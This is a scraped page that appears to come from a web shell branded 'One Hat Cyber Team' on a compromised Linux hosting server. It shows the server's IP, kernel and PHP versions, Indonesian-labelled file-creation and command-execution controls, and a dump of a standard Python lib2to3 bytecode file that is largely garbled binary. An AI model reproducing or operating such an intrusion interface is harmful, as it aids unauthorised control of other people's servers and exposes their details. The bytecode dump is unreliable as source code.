⚝
One Hat Cyber Team
⚝
Your IP:
160.79.110.90
Server IP:
162.254.39.145
Server:
Linux premium289.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
Server Software:
LiteSpeed
PHP Version:
8.2.28
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
lib64
/
python3.8
/
lib2to3
/
fixes
/
__pycache__
/
View File Name :
fix_types.cpython-38.pyc
U e5d� � @ sp d Z ddlmZ ddlmZ ddddddd d dddd dddddddddd�Zdd� eD �ZG dd� dej�ZdS )a� Fixer for removing uses of the types module. These work for only the known names in the types module. The forms above can include types. or not. ie, It is assumed the module is imported either as: import types from types import ... # either * or specific types The import statements are not modified. There should be another fixer that handles at least the following constants: type([]) -> list type(()) -> tuple type('') -> str � )� fixer_base)�Name�bool� memoryview�type�complex�dictztype(Ellipsis)�float�int�list�objectz type(None)ztype(NotImplemented)�slice�bytesz(str,)�tuple�str�range)ZBooleanTypeZ BufferTypeZ ClassTypeZComplexTypeZDictTypeZDictionaryTypeZEllipsisTypeZ FloatTypeZIntTypeZListTypeZLongTypeZ ObjectTypeZNoneTypeZNotImplementedTypeZ SliceTypeZ StringTypeZStringTypesZ TupleTypeZTypeTypeZUnicodeTypeZ XRangeTypec C s g | ]}d | �qS )z)power< 'types' trailer< '.' name='%s' > >� )�.0�tr r �//usr/lib64/python3.8/lib2to3/fixes/fix_types.py� <listcomp>3 s r c @ s"